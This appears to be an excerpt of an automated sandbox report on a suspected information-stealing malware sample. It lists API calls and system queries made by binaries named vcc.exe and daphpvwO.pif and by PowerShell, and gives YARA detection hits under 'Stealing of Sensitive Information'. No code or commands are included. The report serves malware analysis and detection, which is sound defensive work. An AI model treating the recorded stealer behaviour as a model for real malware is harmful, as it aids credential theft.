                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: GetLocaleInfoA,6_2_0288A0B8
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: GetLocaleInfoA,6_2_0288A104
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_028855C8
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: GetLocaleInfoA,11_2_00417A20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02888B38 GetLocalTime,6_2_02888B38
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_02899F00 GetUserNameA,6_2_02899F00
                  Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 6_2_0288B038 GetVersionExA,6_2_0288B038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2b930000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: daphpvwO.pif PID: 3320, type: MEMORYSTR
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE
